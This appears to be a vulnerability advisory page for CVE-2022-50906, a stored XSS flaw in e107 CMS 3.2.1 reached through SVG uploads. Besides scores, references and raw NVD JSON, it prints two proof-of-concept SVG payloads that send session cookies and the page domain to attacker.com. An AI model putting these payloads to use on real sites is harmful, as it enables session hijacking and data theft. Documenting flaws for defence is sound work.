CVE-2022-50906

Description

e107 CMS 3.2.1 contains an upload restriction bypass vulnerability that allows authenticated administrators to upload malicious SVG files through the media manager. Attackers with admin privileges can exploit this vulnerability to upload SVG files with embedded cross-site scripting (XSS) payloads that can execute arbitrary scripts when viewed.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:e107:e107:3.2.1:*:*:*:*:*:*:* - VULNERABLE

e107 CMS 3.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Malicious SVG file for CVE-2022-50906 PoC -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script type="text/javascript">
    // Steal session cookies and send to attacker server
    var cookies = document.cookie;
    fetch('https://attacker.com/steal?c=' + encodeURIComponent(cookies));
  </script>
</svg>

<!-- Alternative payload using event handler -->
<svg xmlns="http://www.w3.org/2000/svg">
  <image href="x" onerror="fetch('https://attacker.com/log?d='+document.domain)"/>
</svg>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50906
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50906
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50906/
[4] VulDB https://vuldb.com/cve/CVE-2022-50906
[5] https://e107.org/
[6] https://e107.org/download
[7] https://www.exploit-db.com/exploits/50910
[8] https://www.vulncheck.com/advisories/e-cms-admin-upload-restriction-bypass-stored-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50906", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:53.260", "lastModified": "2026-01-16T19:16:12.677", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "e107 CMS 3.2.1 contains an upload restriction bypass vulnerability that allows authenticated administrators to upload malicious SVG files through the media manager. Attackers with admin privileges can exploit this vulnerability to upload SVG files with embedded cross-site scripting (XSS) payloads that can execute arbitrary scripts when viewed."}, {"lang": "es", "value": "e107 CMS 3.2.1 contiene una vulnerabilidad de omisión de restricción de carga que permite a los administradores autenticados cargar archivos SVG maliciosos a través del gestor de medios. Los atacantes con privilegios de administrador pueden explotar esta vulnerabilidad para cargar archivos SVG con cargas útiles de cross-site scripting (XSS) incrustadas que pueden ejecutar scripts arbitrarios al ser vistos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:e107:e107:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B1CF95DE-65CF-490D-9817-616CF704B16B"}]}]}], "references": [{"url": "https://e107.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://e107.org/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50910", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/e-cms-admin-upload-restriction-bypass-stored-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}